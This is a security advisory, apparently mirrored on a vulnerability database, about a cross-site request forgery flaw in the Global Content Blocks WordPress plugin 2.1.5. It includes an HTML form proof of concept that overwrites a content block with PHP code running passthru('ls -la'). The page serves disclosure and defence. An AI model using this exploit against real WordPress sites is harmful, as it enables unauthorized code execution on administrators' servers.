Vulners
Lucene search
WordPress Global Content Blocks 2.1.5 Cross Site Request Forgery Vulnerability
------------------------------------------------------------------------
Cross-Site Request Forgery in Global Content Blocks WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Global Content Blocks WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to update a content block to overwrite it with arbitrary PHP
code. Visiting a page or blog post that uses this content block will
cause the attacker's PHP code to be executed.
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0031
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Global Content Blocks WordPress
Plugin version 2.1.5.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_global_content_blocks_wordpress_plugin.html
The issue exists due to the fact that Global Content Blocks does not use the Cross-Site Request Forgery protection provided by WordPress. Actions with Global Content Blocks have a predictable format, thus an attacker can forge a request that can be executed by a logged in Administrator. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
Proof of concept
The following proof of concept will update/overwrite the content block with id 1. In order to run the attacker's PHP code, a page/blog needs to be viewed that contains this content block (eg, [contentblock id=1]).
<html>
<body>
<form action="http://<target>/wp-admin/options-general.php?page=global-content-blocks" method="POST">
<input type="hidden" name="gcb_view" value="update" />
<input type="hidden" name="update_it" value="1" />
<input type="hidden" name="gcb_name" value="Foo" />
<input type="hidden" name="gcb_custom_id" value="" />
<input type="hidden" name="gcb_type" value="php" />
<input type="hidden" name="gcb_description" value="" />
<input type="hidden" name="gcbvalue" value="passthru('ls -la');" />
<input type="hidden" name="gcb_updateshortcode" value="Update" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# 0day.today [2018-01-01] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Mar 2017 00:00Current
7.1High risk
Vulners AI Score7.1